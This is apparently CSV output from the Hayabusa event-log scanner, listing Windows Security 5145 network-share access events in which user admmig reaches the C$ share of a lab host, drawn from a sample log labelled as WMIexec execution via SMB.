2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d29a719#\b04af69b54fb462c4c632d0f508d617b  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d6979e4#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d6979e4#\b77a61cdfca8e3f67916586b89eb6df5  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.097 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2ded559f#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.097 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2ded559f#\2cbdedd1fc5676a39a1fb1b534f48d02  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.097 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W3cdb5602#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W3cdb5602#\e3e82e97635cdd0d33dd1fb39ffe5b5f  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6c95e797#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6c95e797#\4bdb448dffd981eb795d0efeaf81aee9  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6dcfceb1#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6dcfceb1#\bbfc6bc472afc457c523dc2738248629  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W7b7c0837#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W7b7c0837#\294124bd4523f5af19788c4942aeba5e  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e7db7c5#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e7db7c5#\e9ab45e2a1806140421e99300db14933  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e8926d3#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e8926d3#\278d9be2765837ed33460677146f35e8  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W15cd0137#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W15cd0137#\82f3f76602a3738000b03df08a71ffe8  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W37d1a032#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W37d1a032#\d3293b74965baef61a05323c7ec98d92  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W39c436dd#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W39c436dd#\711dbd144f8f71a864ea8493a3877bc5  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W69ef49d2#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W69ef49d2#\28242ebb69175640e01f44f44845482c  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.191 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W71daf281#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W71daf281#\be26a3df8bcf20be912896fba8462d2f  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W81a3882f#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W81a3882f#\84ae811d9df57eca1c9728263a6e6aff  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: USERS  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Default\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Public\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W708fc392#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W708fc392#\4f9e41de8acf7fe60bc43242811fbabd  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W5052cbb1#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W5052cbb1#\960951a3fe97e1a2bd2d09ced71ce4f3  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W57798b05#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W57798b05#\2145d62276d37b22799a8deb8d44b210  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W73044bb5#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W73044bb5#\fb97af1f4b1eed42372eea20ba746a53  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W193497eb#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W193497eb#\a26561bad24a68eb0217aa9d9fdad386  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W08054466#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W08054466#\50e266485611719e095733dd021e3a42  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad38fd8b#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad38fd8b#\44e2747436ee8621f4daf918b1922498  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad78daf4#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad78daf4#\748bf388335b4acc7031af4d134ad037  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb2d030b7#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb2d030b7#\7dbfc45fb55f5cf738956f4c7b2f8639  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb9b5bb58#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb9b5bb58#\789a3b275b1f5369ae5ab066e2461420  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wbc80354b#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wbc80354b#\fac59f632a5e8454549a214641d7bf25  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
